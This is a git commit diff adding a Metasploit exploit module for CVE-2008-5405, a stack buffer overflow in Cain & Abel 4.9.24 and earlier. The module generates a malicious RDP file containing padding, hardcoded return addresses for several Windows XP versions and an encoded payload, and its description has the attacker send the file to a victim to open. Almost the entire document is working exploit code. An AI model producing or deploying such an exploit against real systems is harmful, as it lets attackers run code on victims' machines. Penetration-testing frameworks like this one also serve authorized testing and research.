restored cain_abel_4918_rdp.rb

SaiSakthidar · SaiSakthidar · commit cd9cd7026182 · 2025-12-03T22:13:41.000+05:30
diff --git a/modules/exploits/windows/fileformat/cain_abel_4918_rdp.rb b/modules/exploits/windows/fileformat/cain_abel_4918_rdp.rb
@@ -0,0 +1,71 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = GoodRanking
+
+  include Msf::Exploit::FILEFORMAT
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Cain and Abel RDP Buffer Overflow',
+        'Description' => %q{
+          This module exploits a stack-based buffer overflow in the Cain & Abel v4.9.24
+          and below. An attacker must send the file to victim, and the victim must open
+          the specially crafted RDP file under Tools -> Remote Desktop Password Decoder.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [ 'Trancek <trancek[at]yashira.org>' ],
+        'References' => [
+          [ 'CVE', '2008-5405' ],
+          [ 'OSVDB', '50342' ],
+          [ 'EDB', '7329' ],
+          [ 'BID', '32543' ]
+        ],
+        'Payload' => {
+          'Space' => 800,
+          'BadChars' => "\x00\x0a\x0d\x3c\x22\x3e\x3d",
+          'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
+          'StackAdjustment' => -3500,
+        },
+        'DefaultOptions' => {
+          'AllowWin32SEH' => true
+        },
+        'Platform' => 'win',
+        'Targets' => [
+          # Tested ok aushack 20090503
+          [ 'Windows XP SP2 English',	{ 'Ret' => 0x7c82385d } ], # call esp
+          [ 'Windows XP SP0/1 English',	{ 'Ret' => 0x71ab7bfb } ], # jmp esp
+          [ 'Windows XP SP2 Spanish',	{ 'Ret' => 0x7c951eed } ], # jmp esp
+        ],
+        'Privileged' => false,
+        'DisclosureDate' => '2008-11-30',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('FILENAME', [ true, 'The file name.', 'exploit_cain.rdp']),
+      ]
+    )
+  end
+
+  def exploit
+    filerdp = rand_text_alpha_upper(8206)
+    filerdp << [target.ret].pack('V') + [target.ret].pack('V')
+    filerdp << payload.encoded
+    print_status("Creating '#{datastore['FILENAME']}' file ...")
+
+    file_create(filerdp)
+  end
+end
